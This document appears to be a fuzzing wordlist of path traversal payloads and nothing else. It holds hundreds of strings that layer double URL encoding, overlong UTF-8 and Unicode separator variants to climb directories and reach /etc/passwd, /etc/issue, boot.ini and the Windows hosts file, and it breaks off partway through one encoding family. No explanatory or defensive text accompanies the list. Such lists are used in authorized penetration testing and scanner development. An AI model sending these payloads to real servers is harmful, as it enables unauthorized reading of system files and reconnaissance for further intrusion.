-%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qfboot.ini -%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qf%252e%252e%c0%qfboot.ini -%252e%252e%c0%qf%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfboot.ini -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfboot.ini -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfboot.ini -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfpasswd -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfetc%c0%qfissue -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfboot.ini -%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qf%252e%252e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8sboot.ini -%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8s%252e%252e%c1%8sboot.ini -%252e%252e%c1%8s%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8sboot.ini -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8sboot.ini -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8sboot.ini -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8spasswd -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8sboot.ini -%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1cboot.ini -%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1c%252e%252e%c1%1cboot.ini -%252e%252e%c1%1c%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cboot.ini -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cboot.ini -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cboot.ini -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cpasswd -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cetc%c1%1cissue -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cboot.ini -%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1c%252e%252e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%afboot.ini -%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%c1%af%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%af%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%af%252e%252e%c1%afboot.ini -%252e%252e%c1%af%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afboot.ini -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afboot.ini -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afboot.ini -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afpasswd -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afetc%c1%afissue -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afboot.ini -%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%af%252e%252e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qfboot.ini -%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qf%252e%252e%bg%qfboot.ini -%252e%252e%bg%qf%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfboot.ini -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfboot.ini -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfboot.ini -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfpasswd -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfetc%bg%qfissue -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfboot.ini -%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qf%252e%252e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215etc%u2215issue -%252e%252e%u2215boot.ini -%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2215%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215%252e%252e%u2215etc%u2215issue -%252e%252e%u2215%252e%252e%u2215boot.ini -%252e%252e%u2215%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215issue -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215boot.ini -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215issue -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215boot.ini -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215issue -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215boot.ini -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215passwd -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215etc%u2215issue -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215boot.ini -%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215%252e%252e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216etc%u2216issue -%252e%252e%u2216boot.ini -%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%u2216%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216%252e%252e%u2216etc%u2216issue -%252e%252e%u2216%252e%252e%u2216boot.ini -%252e%252e%u2216%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216issue -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216boot.ini -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216issue -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216boot.ini -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216issue -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216boot.ini -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216passwd -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216issue -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216boot.ini -%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8passwd -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8etc%uEFC8issue -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8boot.ini -%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8%252e%252e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025etc%uF025issue -%252e%252e%uF025boot.ini -%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%uF025%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025%252e%252e%uF025etc%uF025issue -%252e%252e%uF025%252e%252e%uF025boot.ini -%252e%252e%uF025%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025issue -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025boot.ini -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025issue -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025boot.ini -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025issue -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025boot.ini -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025passwd -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025issue -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025boot.ini -%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66passwd -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66etc%%32%%66issue -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66boot.ini -%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66%252e%252e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63passwd -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63etc%%35%%63issue -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63boot.ini -%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63%252e%252e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%252e%252e%e0%80%afetc%e0%80%afpasswd -%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afpasswd 